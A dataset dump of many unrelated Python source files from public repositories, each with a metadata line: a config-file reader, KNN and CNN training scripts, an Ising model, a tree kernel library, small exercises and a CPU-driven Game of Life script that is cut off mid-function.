3a0f042c06ef181633b962807331c4cad4a6a146 | Python | vral-parmar/Basic-Python-Programming | /Configuration_using_python/test.py | UTF-8 | 473 | 2.75 | 3 | [] | no_license | #import class
from configparser import ConfigParser
# create an instance of ConfigParser class.
parser = ConfigParser()
# read and parse the configuration file.
parser.read('Configuration_using_python/conf.ini')
['Configuration_using_python/conf.ini']
# get option value in specified section.
mysql_conn_host = parser.get('mysql_conn', 'host')
#print option values
print(mysql_conn_host)
#get user account Info
account = parser.get('account', 'user_name')
print(account)
| true |
8c2ca5692c6f57ea6822fda857c18b5ff1616cc3 | Python | jpinedaa/Box-Office-Prediction | /KNN_model.py | UTF-8 | 2,306 | 2.84375 | 3 | [] | no_license | import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import itertools
from sklearn.model_selection import train_test_split
from sklearn.neighbors import KNeighborsRegressor
from sklearn.metrics import mean_squared_error, r2_score
from sklearn import decomposition
from sklearn.model_selection import KFold
from sklearn.preprocessing import StandardScaler
from math import sqrt
import random
dataset = pd.read_table('data/movies_data_12-18.csv', sep=';')
def append_feature(X, feature, dataset):
feature_set = list(set(dataset.iloc[:, feature].values))
feature_org = dataset.iloc[:, feature].values
feature_con = []
for entry in feature_org:
feature_con.append([feature_set.index(entry)])
X = np.append(X, feature_con, 1)
return X
def run_knn(dataset, features, neighbors, appendable_features = [], enable_scaler = False, PCA = 0):
X = dataset.iloc[:, features].values
y = dataset.iloc[:, 7].values
for f in appendable_features:
X = append_feature(X, f, dataset)
if enable_scaler:
scaler = StandardScaler()
scaler.fit(X)
X = scaler.transform(X)
if PCA != 0:
pca = decomposition.PCA(n_components=PCA)
X = pca.fit_transform(X)
info = []
#X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.20)
kf = KFold(n_splits=10, shuffle=True)
for train, test in kf.split(X):
X_train = X[train]
X_test = X[test]
y_train = y[train]
y_test = y[test]
model = KNeighborsRegressor(n_neighbors=neighbors)
model.fit(X_train, y_train)
y_pred_train = model.predict(X_train)
y_pred = model.predict(X_test)
info_row = [mean_squared_error(y_test, y_pred), r2_score(y_test, y_pred), sqrt(mean_squared_error(y_test, y_pred)), mean_squared_error(y_train, y_pred_train), r2_score(y_train, y_pred_train), sqrt(mean_squared_error(y_train, y_pred_train))]
info.append(info_row)
stats = [0, 0, 0, 0, 0, 0]
for i in range(10):
for j in range(6):
stats[j] += info[i][j]
for j in range(6):
stats[j] /= 10
return stats
stats = run_knn(dataset, [6, 11, 12], 10, [3], True)
print(stats) | true |
6ec27a508c449122976f0b6eb6620ff92e527223 | Python | StephenWasntAvailable/CompSim18_19 | /Ising Project/Ising2018Alternate.py | UTF-8 | 1,557 | 2.859375 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Wed Oct 31 21:22:36 2018
@author: Stephen
"""
import numpy as np
import matplotlib.pyplot as plt
import scipy
import random
class IsingPointSimple:
"""Class representing each individual lattice point for the case of nearest neighbour interactions
and colinear spins, in 2 dimensions"""
def __init__(self, x, y, spin, didflip, flipcause):
self.x = x
self.y = y
self.spin = spin
self.didflip = didflip
self.flipcause = flipcause
class IsingLatticeSimple:
"""Class representing the overall lattice, built up of a set of IsingPointSimple objects"""
def __init__(self, size, temp, spins, lattice):
if lattice == 0:
self.size = size
self.temp = temp
self.spins = spins
self.lattice = np.zeros((self.size, self.size))
for i in range(size):
for j in range(size):
self.lattice[i][j] = IsingPointSimple(i, j, random.choice(self.spins), 0, 0)
else:
self.size = lattice.size
self.temp = lattice.temp
self.spins = lattice.spins
self.lattice = lattice.lattice
# selfnp.array([[random.choice(self.spins) for i in range(self.size)] for i in range(self.size)])
def show_lattice(self):
plt.imshow(self.lattice, shape = 'circle',interpolation = 'nearest')
testlattice = IsingLatticeSimple(10, 2, [1, -1], 0)
testlattice.show_lattice() | true |
6887b0ef8101db348540c1a9afd1bbdbae83341d | Python | rgtjf/Semantic-Texual-Similarity-Toolkits | /stst/libs/kernel/tree.py | UTF-8 | 18,695 | 3.40625 | 3 | [
"MIT"
] | permissive | # coding: utf8
"""
A set of Classes to handle trees and compute kernel functions on them
"""
from __future__ import print_function
import random
import bisect
class TreeNode:
# A simple class for handling tree nodes
def __init__(self, val=None, chs=[]):
self.val = val # node label
self.chs = chs # list of children of the node
@classmethod
def fromPrologString(cls, s):
# to be invoked as tree.TreeNode.fromPrologString(s)
# where s is the string encoding the tree
# The format is as follows:
s = s.rstrip('\n') # remove trailing newlines
i, tmps, lens = (0, "", len(s))
while i < lens and s[i] in "-+0123456789":
tmps += s[i]
i += 1
if i >= lens or s[i] != " ":
i = 0
else:
i += 1
aa = []
while (i < lens):
tmps = ""
while (i < lens) and s[i] not in ('(', ')', ','):
tmps += s[i]
i += 1
if len(tmps) > 0:
t = cls(tmps, [])
if len(aa) > 0:
aa[-1].chs.append(t)
if i < lens:
if s[i] == '(':
aa.append(t)
elif s[i] == ')':
t = aa.pop()
elif s[i] == ',':
pass
i += 1
return t
def tostring_prolog(self):
# returns a string in which the subtree rooted
# at self is represented in prolog-style
if not self:
return
stri = ""
# if hasattr(self,'chs') and
if self.chs:
stri += "%s(" % self.val
for i, c in enumerate(self.chs):
stri += c.tostring_prolog()
if i < len(self.chs) - 1:
stri += ","
stri += ")"
else:
stri += "%s" % self.val
return stri
def __str__(self):
# return the tree in prolog format
return self.tostring_prolog()
def tostring_svmlight(self):
# returns a string in which the subtree rooted
# at self is represented in svmlight-style
if not self:
return
stri = ""
if self.chs:
stri += "(%s " % self.val
for i, c in enumerate(self.chs):
stri += c.tostring_svmlight()
stri += ")"
else:
stri += "(%s -)" % self.val
return stri
def getLabel(self):
return self.val
def getChild(self, i):
return self.chs[i]
def getChildren(self):
return self.chs
def getOutdegree(self):
if not self:
return 0
else:
return len(self.chs)
def getMaxOutdegree(self):
if not self:
return 0
else:
m = self.getOutdegree()
for c in self.chs:
m = max(m, c.getMaxOutdegree())
return m
def getNodeLabelList(self):
# returns the list of labels of all descendants of self
if not self: return []
p = [self.val]
for c in self.chs:
p.extend(c.getNodeLabelList())
return p
def labelList(self):
# returns the list of labels of all descendants of self
if not self: return []
p = [(self.val, self)]
for c in self.chs:
p.extend(c.labelList())
return p
def getProduction(self):
# return the label of the node concatenated with the labels of its children
if not self: return ""
self.production = self.val + "(" + ','.join([c.val for c in self.chs]) + ")"
return self.production
def productionlist(self):
# returns the list of productions of all nodes
# in the subtree rooted at self
if not self: return []
p = [(self.getProduction(), self)]
for c in self.chs:
p.extend(c.productionlist())
return p
def getSubtreeSize(self):
# returns the number of nodes in the subtree rooted at self
if not self:
return 0
n = 1
for c in self.chs:
n += c.getSubtreeSize()
return n
def setSubtreeSize(self):
# returns the number of nodes in the subtree rooted at self
# for each visited node A such value is stored in A.stsize
if not self:
self.stsize = 0
return 0
n = 1
for c in self.chs:
n += c.setSubtreeSize()
self.stsize = n
return n
def setSubtreeRoutes(self, r=""):
self.route = r
i = 1
for c in self.chs:
c.setSubtreeRoutes(r + str(i) + "#")
i += 1
def getDepth(self):
if not hasattr(self, 'depth'):
print("ERROR: node depth has not been computed!")
return ""
return self.depth
def setDepth(self, subtreerootdepth=0):
# compute the depth (w.r.t self) of the descendants of self
if not self:
return
self.depth = subtreerootdepth
for c in self.chs:
c.setDepth(subtreerootdepth + 1)
return
def height(self):
# returns the length of the longest path
# connecting self to its farthest leaf
if not self:
return 0
p = 0
for c in self.chs:
p = max(p, c.height())
return p + 1
def getSubtreeID(self):
return self.subtreeId
def getLabelFrequencies(self):
lab = {}
lab[self.val] = 1
for c in self.chs:
l = c.getLabelFrequencies()
for lk in l.keys():
if not lk in lab:
lab[lk] = l[lk]
else:
lab[lk] += l[lk]
return lab
def getHashSubtreeIdentifier(self, sep):
# compute an hash value from the label of the node
# self and the hash values of the children of self
if not self: return
stri = self.val
for c in self.chs:
stri += sep + c.getHashSubtreeIdentifier()
return str(hash(stri))
def setHashSubtreeIdentifier(self, sep):
# compute an hash value from the label of the node
# self and the hash values of the children of self
# For each visited node A the hash value is stored
# into A.hash
if not self: return
stri = self.val
if stri.find(sep) != -1:
print("ERROR: identifier " + sep + "used in label. Please set it with setHashSep(newsep)")
for c in self.chs:
stri += sep + c.setHashSubtreeIdentifier(sep)
self.subtreeId = str(hash(stri))
return self.subtreeId
def computeSubtreeIDSubtreeSizeList(self):
# compute a list of pairs (subtree-hash-identifiers, subtree-size)
if not self:
return
p = [(self.subtreeId, self.stsize)]
for c in self.chs:
p.extend(c.computeSubtreeIDSubtreeSizeList())
return p
def computeSubtreeIDSubtreeSizeRouteList(self):
if not self:
return
p = [(self.val, self.subtreeId, self.stsize, self.depth, self.route)]
for c in self.chs:
p.extend(c.computeSubtreeIDSubtreeSizeRouteList())
return p
def computeSubtreeIDSubtreeSizeRouteRouteHashList(self, h):
if not self:
return
p = [(self.val, self.subtreeId, self.stsize, self.depth, self.route, h)]
i = 1
for c in self.chs:
p.extend(c.computeSubtreeIDSubtreeSizeRouteRouteHashList(str(hash(h + "#" + str(i)))))
i += 1
return p
def computeSubtreePositionIDLabelSubtreeSizeList(self, h):
# compute a hash whose key is the subtree-position-identifier and the value
# is a triplet (subtree-hash-identifiers, node depth, subtree-size)
# A key is constructed for each node
if not self:
return
p = {}
p[h] = (self.subtreeId, self.getDepth(), self.stsize)
i = -1
for c in self.chs:
i += 1
p.update(c.computeSubtreePositionIDLabelSubtreeSizeList(str(hash(h + "#" + str(i)))))
return p
def computeSubtreePositionIDSubtreeIDSubtreeSizeListLabel(self, h):
if not self:
return
p, pinv = ({}, {})
p[h] = (self.subtreeId, self.stsize)
pinv[self.subtreeId] = h
i = -1
for c in self.chs:
i += 1
(tmpp, tmppinv) = c.computeSubtreePositionIDSubtreeIDSubtreeSizeListLabel(str(hash(h + "#" + str(i))))
p.update(tmpp)
pinv.update(tmppinv)
return (p, pinv)
def computeSubtreeIDTreeNodeList(self):
if not self:
return
p = [(self.subtreeId, self)]
for c in self.chs:
p.extend(c.computeSubtreeIDTreeNode())
return p
class RandomTrees():
# A class for generating random trees
def __init__(self, p, d, outdegree, nodelabels):
self.p = p
self.d = d
self.outdegree = outdegree
self.nodelabels = nodelabels
def __newTree(self, p):
if random.random() > p:
return None
chs = []
for i in range(self.outdegree):
t = self.__newTree(p * self.d)
if t: chs.append(t)
return TreeNode(self.randomLabel(), chs)
def newTree(self):
t = self.__newTree(self.p)
while not t:
t = self.__newTree(self.p)
return t
def randomLabel(self):
return random.choice(self.nodelabels)
class RandomTreesPowerLawDistribution(RandomTrees):
# A class for generating random trees where labels are selected
# randomly according zipf distribution (first elements
# have much higher probability to be selected than last ones)
def __init__(self, p, d, outdegree, numberoflabels):
RandomTrees.__init__(self, p, d, outdegree, [])
s = 0.99
# self.labelfrequency = [0]*numberoflabels
self.nodelabels = [1 / (i ** s) for i in range(1, numberoflabels + 1)]
norm = sum(self.nodelabels)
self.nodelabels = [x / norm for x in self.nodelabels]
cpd = 0
for i in range(0, numberoflabels):
cpd += self.nodelabels[i]
self.nodelabels[i] = cpd
def randomLabel(self):
r = bisect.bisect(self.nodelabels, random.random())
# self.labelfrequency[r] += 1
return r
class Tree:
# A tree instance suitable for being processed by a tree kernel
# A TreeNode retain properties of single nodes, a Tree a property
# of a set of nodes: max/average outdegree, max depth
def __init__(self, root, target=""):
self.root = root
self.target = target
@classmethod
def fromPrologString(cls, s):
# to be invoked as tree.Tree.fromPrologString(s)
# where s is the string encoding the tree
target, i, tmps = ("", 0, "")
while s[i] in "-+0123456789":
tmps += s[i]
i += 1
if len(tmps) > 0 and s[i] == " ": # the target is valid
target = tmps
return cls(TreeNode.fromPrologString(s), target)
def deleteRootTreeNode(self):
self.root = None
def getMaxDepth(self):
if not hasattr(self.root, 'maxdepth'):
return self.root.height()
else:
return self.maxdepth
def computeNodesDepth(self):
self.root.setDepth()
def setMaxDepth(self):
self.maxdepth = self.root.height()
def getMaxOutdegree(self):
if not self.root:
return 0 # ERROR?
else:
return self.root.getMaxOutdegree()
def getLabelFrequencies(self):
if not self.root:
return {}
else:
return self.root.getLabelFrequencies()
def __str__(self):
if self.target:
return str(self.target) + " " + str(self.root)
else:
return str(self.root)
def printFormat(self, frmt="prolog"):
s = ""
if self.target:
s = str(self.target) + " "
if frmt == "prolog":
s += self.root.tostring_prolog()
elif frmt == "svmlight":
s += "|BT| " + self.root.tostring_svmlight() + " |ET| "
return s
def computeSubtreeIDs(self, hashsep):
self.root.setHashSubtreeIdentifier(hashsep)
def computeRoutes(self, r=""):
self.root.setSubtreeRoutes(r)
class SubtreeIDSubtreeSizeList():
def __init__(self, root):
self.sids = root.computeSubtreeIDSubtreeSizeList()
def getSubtreeID(self, i):
return self.sids[i][0]
def getSubtreeSize(self, i):
return self.sids[i][1]
def sort(self):
self.sids.sort()
def __len__(self):
return len(self.sids)
class ProdSubtreeList():
def __init__(self, root):
self.prodorderedlist = root.productionlist()
def getProduction(self, i):
return self.prodorderedlist[i][0]
def getTree(self, i):
return self.prodorderedlist[i][1]
def sort(self):
self.prodorderedlist.sort(cmp=lambda x, y: cmp(x[0], y[0]))
self.prodorderedlist.sort(cmp=lambda x, y: cmp(len(x[0]), len(y[0])))
def __len__(self):
return len(self.prodorderedlist)
def compareprods(x, y):
if len(x[0]) == len(y[0]):
return cmp(x[0], y[0])
else:
return cmp(len(x[0]), len(y[0]))
class LabelSubtreeList():
def __init__(self, root):
self.labelList = root.labelList()
def getLabel(self, i):
return self.labelList[i][0]
def getTree(self, i):
return self.labelList[i][1]
def sort(self):
self.labelList.sort(cmp=lambda x, y: cmp(x[0], y[0]))
def __len__(self):
return len(self.labelList)
class SubtreePositionIDLabelSubtreeSizeList():
def __init__(self, root):
self.sids = root.computeSubtreePositionIDLabelSubtreeSizeList(str(hash('0')))
def getSubtreeID(self, i):
return self.sids[i][0][0]
def getLabel(self, i):
return self.sids[i][1]
def getSubtreeSize(self, i):
return self.sids[i][0][2]
def __len__(self):
return len(self.sids)
class SubtreePositionIDSubtreeIDSubtreeSizeListLabel():
def __init__(self, root):
(self.sids, self.pinv) = root.computeSubtreePositionIDSubtreeIDSubtreeSizeListLabel(str(hash('0')))
def getSubtreeID(self, i):
return self.sids[i][0]
def getPositionID(self, label):
return self.pinv[label]
def getSubtreeSize(self, i):
return self.sids[i][1]
def __len__(self):
return len(self.sids)
class SubtreeIDSubtreeSizeRouteList():
# Currently used by Tree Kernel class PdakMine
def __init__(self, root):
self.sids = root.computeSubtreeIDSubtreeSizeRouteRouteHashList("0")
def getLabel(self, i):
return self.sids[i][0]
def getSubtreeID(self, i):
return self.sids[i][1]
def getSubtreeSize(self, i):
return self.sids[i][2]
def getDepth(self, i):
return self.sids[i][3]
def getRoute(self, i):
return self.sids[i][4]
def getRouteHash(self, i):
return self.sids[i][5]
def sort(self):
self.sids.sort(cmp=lambda x, y: cmp(x[1], y[1]))
self.sids.sort()
def __len__(self):
return len(self.sids)
class Dataset():
# A class for handling a collection of Tree Objects
def __init__(self, treeList=[]):
self.examples = treeList
def loadFromFilePrologFormat(self, filename):
self.filename = filename
self.examples = []
f = open(filename, "r")
for line in f:
self.examples.append(self.loadExamplePrologFormat(line))
f.close()
def generateRandomDataset(self, randObj, numberofexamples):
self.examples = []
for i in range(numberofexamples):
self.examples.append(Tree(randObj.newTree(), 1))
def __len__(self):
return len(self.examples)
def getExample(self, i):
return self.examples[i]
def loadExamplePrologFormat(self, line):
return Tree.fromPrologString(line)
def __len__(self):
return len(self.examples)
def getTotalNumberOfNodes(self):
if hasattr(self, 'totalnodes'):
return self.totalnodes
else:
s = 0
for i in range(len(self.examples)):
s += self.examples[i].root.getSubtreeSize()
return s
def setTotalNumberOfNodes(self):
self.totalnodes = self.getTotalNumberOfNodes()
def getNodesNumberAverage(self):
return self.getTotalNumberOfNodes() / len(self.examples)
def getNodesNumberVariance(self):
avg = self.getNodesNumberAverage()
s = 0
for i in range(len(self.examples)):
s += (avg - len(self.examples[i])) ** 2
return s / (len(self.examples))
def getAverageMaxOutdegree(self):
o = 0
for i in range(len(self.examples)):
o += self.examples[i].getMaxOutdegree()
return o
def getMaxMaxOutdegree(self):
o = 0
for i in range(len(self.examples)):
o = max(o, self.examples[i].getMaxOutdegree())
return o
def getMaxAndAverageMaxOutdegree(self):
o, m = (0, 0)
for i in range(len(self.examples)):
cm = self.examples[i].getMaxOutdegree()
o += cm
m = max(m, cm)
return o, m
def random_permutation(self, seed):
pass
def getLabelFrequencies(self):
lab = {}
for i in range(len(self.examples)):
l = self.examples[i].getLabelFrequencies()
for lk in l.keys():
if lk not in lab:
lab[lk] = l[lk]
else:
lab[lk] += l[lk]
return lab
def getStats(self):
self.setTotalNumberOfNodes()
avgo, maxo = self.getMaxAndAverageMaxOutdegree()
s = "%f %d %d %f" % (self.getNodesNumberAverage(), self.getTotalNumberOfNodes(), maxo, avgo)
return s
def printToFile(self, filename):
f = open(filename, "w")
for i in range(len(self.examples)):
f.write(str(self.examples[i]) + "\n")
f.close()
def printToFileSvmlightFormat(self, filename):
f = open(filename, "w")
for i in range(len(self.examples)):
f.write(str(self.examples[i].printFormat("svmlight")) + "\n")
f.close()
| true |
0d6764e7f042d4c24df7201cf03d613ca76f0c33 | Python | AfiqAmmar/Operating-System-Lab | /Lab 7/Sequential.py | UTF-8 | 1,483 | 3.59375 | 4 | [] | no_license | filelength = 50
files = [0]*filelength
for x in range(files.__len__()):
files[x] = 0
flag = 1
while flag == 1:
start = int(input("Please enter the starting block:"))
while (start<=0 or start>filelength):
if start<=0:
print("Please enter a positive number!")
if start>50:
print("Starting block entered exceeds files limit!")
start = int(input("Please enter the starting block:"))
length = int(input("Please enter the length of the files:"))
while length<=0 or length>filelength:
if length<=0:
print("Please enter a positive number!")
if length>50:
print("Starting block entered exceeds files limit!")
length = int(input("Please enter the length of the files:"))
check = 0
for x in range(length):
if files[start+x] == 0:
check +=1
if check == length:
for x in range(length):
files[start+x] = 1
print("Files are allocated")
else:
print("Files are not allocated")
choice = True
while True:
resume = input(("Do you want to enter more files? (yes/no)"))
if resume == 'yes' or resume == 'YES':
flag = 1
break
elif resume == 'no' or resume == 'NO':
flag = 0
break
else:
choice = True
print("Files allocated:")
for x in range(length):
print(" Files [",x+1,"] allocated")
| true |
0ad25aad0dec558adc06f80596d2304f6cdd71e9 | Python | uni51/python_tutorial | /pyq/25_container/fast_data_dict/py3.py | UTF-8 | 471 | 4.1875 | 4 | [] | no_license | # イテラブルを返すメソッド
d = {'art': 1, 'box': 2, 'cup': 3}
# keys() : キーを要素とするイテラブルを返します。
print('keys:')
for k in d.keys():
print(k)
print()
# values() : 値を要素とするイテラブルを返します。
print('values:')
for v in d.values():
print(v)
print()
# itms() : キーと値のタプルを要素とするイテラブルを返します。
print('items:')
for k, v in d.items():
print(k, v)
| true |
4e1d3034629934d1dd4d477ed81f342465db6bf7 | Python | KJSui/leetcode-2020 | /expressionAddOperations.py | UTF-8 | 1,055 | 3 | 3 | [] | no_license | class Solution:
def addOperators(self, num, target):
self.res = []
self.dfs(0, 0, 0, 0, [])
return self.res
def dfs(self, num, target, idx, prev, curr, value, string):
if idx == len(num):
if value == target and curr == 0:
self.res.append("".join(string[1:]))
return
curr = curr * 10 + int(num[idx])
str_op = str(curr)
if curr > 0:
self.dfs(num, target, idx+1, prev, curr, value, string)
string.append('+')
string.append(str_op)
self.dfs(num, target, idx+1, prev, 0, value+curr, string)
string.pop()
string.pop()
if string:
string.append('-')
string.append(str_op)
self.dfs(idx+1, -curr, 0, value-curr, string)
string.pop()
string.pop()
string.append('*')
string.append(str_op)
self.dfs(idx+1, curr * prev, 0, value-prev+ curr * prev, string)
string.pop()
string.pop()
| true |
d052cbb994497d25f90d44df289a24b5777ac972 | Python | pulakanamnikitha/nikki | /37.py | UTF-8 | 77 | 2.6875 | 3 | [] | no_license | x,y=map(int,raw_input().split())
n1=int(x)
n2=int(y)
n1,n2=n2,n1
print n1,n2
| true |
8499c977f689e781c9716c2edcd965a684378c70 | Python | AlimiG/Euler | /609_pi_sequence.py | UTF-8 | 494 | 3.3125 | 3 | [] | no_license | def sieve(n):
is_prime = [True]*n
is_prime[0] = False
is_prime[1] = False
for i in range(2,int(n**0.5) +1):
index = i*2
while index < n:
is_prime[index] = False
index = index + i
prime = []
for i in range(n):
if is_prime[i] == True:
prime.append(i)
return prime
primes = sieve(10000)
def pi(n):
j = 0
summ = 0
while j < n:
j = primes[summ]
summ = summ + 1
return (summ-1)
| true |
894c3cff96caa1612132bd10913b31d5cdd3b3f9 | Python | hisyatokaku/Competition | /ABC/110/C.py | UTF-8 | 504 | 3.0625 | 3 | [] | no_license | S = input()
T = input()
c2pos=dict()
s_c2pos = dict()
for ix, c in enumerate(S):
if s_c2pos.get(c) == None:
s_c2pos[c] = [ix]
else:
s_c2pos[c].append(ix)
for ix, c in enumerate(T):
if c2pos.get(c) == None:
c2pos[c] = [ix]
else:
c2pos[c].append(ix)
res = "Yes"
for k, v in c2pos.items():
if len(v) < 1:
continue
if len(set([S[_v] for _v in v])) != 1:
res = "No"
if s_c2pos[S[v[0]]] != v:
res = "No"
print(res)
| true |
2c74253f08f6f1c1af1bbb46bf5c87991b2856a6 | Python | kimgs20/PyTorch | /torch_expand.py | UTF-8 | 748 | 3.625 | 4 | [] | no_license | '''
torch.repeat(*sizes)
copy tensor
torch.expand(*sizes)
same as repeat but can use only 1-dimension
'''
import torch
'''
# torch.repeat(*sizes)
x = torch.tensor([1, 2, 3])
x_42 = x.repeat(4, 2) # 4row 2column
print(x_42)
print(x_42.size()) # [4, 6]
x_421 = x.repeat(4, 2, 1)
print(x_421)
print(x_421.size()) # [4, 2, 3]
'''
# torch.expand(*sizes)
x = torch.tensor([[1], [2], [3]])
print(x.size())
print()
x_exp = x.expand(3, 1)
print(x_exp)
print()
x_exp = x.expand(3, 3)
print(x_exp)
print()
x_exp = x.expand(3, 4) # if first dim is not 3, error occurs
print(x_exp)
print(x_exp.size())
print()
x_exp_mi = x.expand(-1, 4) # -1 means not changin the size of that dimension
print(x_exp_mi)
print(x_exp_mi.size())
# x_exp == x_exp_mi''' | true |
bccc63db7d06a54bc5efb30cf4f4ccc3ae6301a8 | Python | NIU-Data-Science/CNN-exercise | /CNN_trainer.py | UTF-8 | 3,279 | 3.25 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Thu Aug 30 10:30:02 2018
@author: Dr. Mark M. Bailey | National Intelligence University
"""
"""
Usage notes:
This training script requires a file hierarchy as follows, which exists in the SAME directory as this script:
training_set
Label1
Label2
test_set
Label1
Label2
This script will export the model artifact (*.h5) to the same directory as this script.
"""
print('Loading...')
#Import Keras libraries and packages
from keras.models import Sequential
from keras.layers import Conv2D
from keras.layers import MaxPooling2D
from keras.layers import Flatten
from keras.layers import Dense
import os
#Helper function
def get_files(directory):
file_list = []
for root, dirs, files in os.walk(directory):
for name in files:
file_list.append(os.path.join(root, name))
return file_list
print('CNN will build your convolutional neural network!')
print('====================================================')
print('Accessing image data...')
model_name = 'CNN_model'
training_files_list = get_files(os.path.join(os.getcwd(), 'training_set'))
train_number = len(training_files_list)
test_files_list = get_files(os.path.join(os.getcwd(), 'test_set'))
test_number = len(test_files_list)
print('Training model...')
#Instantiate the convolutional neural network
classifier = Sequential()
#Convolution
classifier.add(Conv2D(32, (3, 3), input_shape = (64, 64, 3), activation = 'relu'))
#Pooling
classifier.add(MaxPooling2D(pool_size = (2, 2)))
#Add a second convolutional layer
classifier.add(Conv2D(32, (3, 3), activation = 'relu'))
classifier.add(MaxPooling2D(pool_size = (2, 2)))
#Flattening
classifier.add(Flatten())
#Full connection
classifier.add(Dense(units = 128, activation = 'relu'))
classifier.add(Dense(units = 1, activation = 'sigmoid'))
#Compiling the CNN
classifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])
#Fitting the CNN to the images
from keras.preprocessing.image import ImageDataGenerator
test_datagen = ImageDataGenerator(rescale=1. / 255)
validation_generator = test_datagen.flow_from_directory('test_set', target_size=(64, 64), batch_size=32, class_mode='categorical')
train_datagen = ImageDataGenerator(rescale = 1./255, shear_range = 0.2, zoom_range = 0.2, horizontal_flip = True)
test_datagen = ImageDataGenerator(rescale = 1./255)
training_set = train_datagen.flow_from_directory('training_set', target_size = (64, 64), batch_size = 32, class_mode = 'binary')
test_set = test_datagen.flow_from_directory('test_set', target_size = (64, 64), batch_size = 32, class_mode = 'binary')
classifier.fit_generator(training_set, steps_per_epoch = train_number, epochs = 25, validation_data = test_set, validation_steps = test_number)
classes = training_set.class_indices
#Export CNN model
print('Exporting model...')
import json
with open('classes.json', 'w') as outfile:
json.dump(classes, outfile)
model_name_str = model_name + '.h5'
classifier.save(model_name_str)
print('CNN model exported as {}'.format(model_name_str))
print('You are a great American!!') | true |
d11826f08424d9e45609674452a36426bb5eaa8a | Python | Kwangwoo94/pythonsource-vscode- | /beautifulsoup/clien2.py | UTF-8 | 834 | 3.03125 | 3 | [] | no_license | import requests
from bs4 import BeautifulSoup
import xlsx_write as excel
# clien 사이트의 팁과 강좌 게시판의 1 페이지 타이틀 크롤링
# https://www.clien.net/service/board/lecture
response = requests.get("https://www.clien.net/service/board/lecture")
soup = BeautifulSoup(response.content,'html.parser')
# 타이틀 찾기
titles = soup.select("span.subject_fixed")
# 비어 있는 리스트 생성
board_list = list()
for title in titles:
# print(title.string.strip())
board_title = [title.string.strip()]
print(board_title)
board_list.append(board_title)
# [['아마존(미국) 배송대행한 경우의 반품 경험'],
# ['영국 델타 변이에 의한 사망자 vs 접종별, 연령대 별 비교'] ]
excel.write_excel_template("clien1.xlsx","팁과강좌",board_list)
| true |
f32836b6e401c3ae84fb17e37bb925e82d382cfc | Python | AlexGumash/Big-Data-and-IKhiIAS | /lab2/stripes/formatOutput.py | UTF-8 | 746 | 2.890625 | 3 | [] | no_license | #!/usr/bin/python2
import pyhdfs
import ast, json
word = str(input("Your word: "))
count = int(input("Count: "))
fs = pyhdfs.HdfsClient(hosts='localhost:50070', user_name='bsbo228')
output = fs.open('/user/bsbo228/lab2/output/part-00000')
for line in output:
striped = line.strip().split("\t")
key = striped[0].split(',')[0]
d = striped[1]
d = json.loads(d.replace("'", "\""))
d = ast.literal_eval(json.dumps(d))
if key == word:
list_d = list(d.items())
list_d.sort(key=lambda i: i[1], reverse=True)
j = 0
print (str(count) + " most purchased items with item " + word)
for i in list_d:
if j < count:
print str(i[0])+': ' + str(i[1])
j += 1 | true |
b41e6282657cf98a17b8a2938b53f872cb2f88b9 | Python | diego-go/taller_python_PROTECO | /1er semana/paquetes/ConwayCPU-0.5/bin/ConwayCPU.py | UTF-8 | 7,505 | 3.234375 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python
"""Conway's Game of Life, drawn to the terminal care of the Blessings lib
A board is represented like this::
{(x, y): state,
...}
...where ``state`` is an int from 0..2 representing a color.
"""
from contextlib import nested
from itertools import chain
from random import randint
from sys import stdout
from sys import argv
from time import sleep, time
from blessings import Terminal
from psutil import cpu_percent
from random import random
def main():
"""Play Conway's Game of Life on the terminal."""
def die((x, y)):
"""Pretend any out-of-bounds cell is dead."""
if 0 <= x < width and 0 <= y < height:
return x, y
LOAD_FACTOR = 10 # Smaller means more crowded.
NUDGING_LOAD_FACTOR = LOAD_FACTOR * 3 # Smaller means a bigger nudge.
term = Terminal()
width = term.width
height = term.height
board = random_board(width - 1, height - 1, LOAD_FACTOR)
# detector = BoredomDetector()
cells = cell_strings(term)
if len(argv) > 1:
cpu_cap = float(argv[1])
else:
cpu_cap = 1
section_width = width/len(cpu_percent(interval=0.1, percpu=True)) + \
len(cpu_percent(interval=0.1, percpu=True))
with nested(term.fullscreen(), term.hidden_cursor()):
try:
while True:
frame_end = time() + 0.4
board = next_board(board, section_width,
map(lambda X: get_agitation(X, cpu_cap), cpu_percent(interval=0.2, percpu=True)),
die)
# board.update(agitate_board(board, 1 - cpu_percent(interval=0.2)/100))
draw(board, term, cells)
# If the pattern is stuck in a loop, give it a nudge:
# if detector.is_bored_of(board):
# board.update(random_board(width - 1,
# height - 1,
# NUDGING_LOAD_FACTOR))
stdout.flush()
sleep_until(frame_end)
clear(board, term, height)
except KeyboardInterrupt:
pass
def sleep_until(target_time):
"""If the given time (in secs) hasn't passed, sleep until it arrives."""
now = time()
if now < target_time:
sleep(target_time - now)
def cell_strings(term):
"""Return the strings that represent each possible living cell state.
Return the most colorful ones the terminal supports.
"""
num_colors = term.number_of_colors
if num_colors >= 16:
funcs = term.on_bright_cyan, term.on_bright_cyan, term.on_bright_green, term.on_bright_yellow
elif num_colors >= 8:
funcs = term.on_cyan, term.on_cyan, term.on_green, term.on_yellow
else:
# For black and white, use the checkerboard cursor from the vt100
# alternate charset:
return (term.reverse(' '),
term.smacs + term.reverse('a') + term.rmacs,
term.smacs + 'a' + term.rmacs)
# Wrap spaces in whatever pretty colors we chose:
return [f(' ') for f in funcs]
def random_board(max_x, max_y, load_factor):
"""Return a random board with given max x and y coords."""
return dict(((randint(0, max_x), randint(0, max_y)), 0) for _ in
xrange(int(max_x * max_y / load_factor)))
# def agitate_board(board, factor):
# # Consider only the neighbors of currently living cells
# spawn_points = set(chain(*map(neighbors, board)))
# agitated_board = {}
# print factor**(factor*100)
# for point in spawn_points:
# should_spawn = (factor**(factor*50))/2
# if should_spawn > random():
# state = 3
# else:
# state = None
# if state is not None:
# agitated_board[point] = state
# return agitated_board
def clear(board, term, height):
"""Clear the droppings of the given board."""
for y in xrange(height):
print term.move(y, 0) + term.clear_eol,
def draw(board, term, cells):
"""Draw a board to the terminal."""
for (x, y), state in board.iteritems():
with term.location(x, y):
print cells[state],
def get_agitation(raw_cpu, cap):
cpu_usage = raw_cpu/100
capped_cpu = cpu_usage / cap
if capped_cpu > 1:
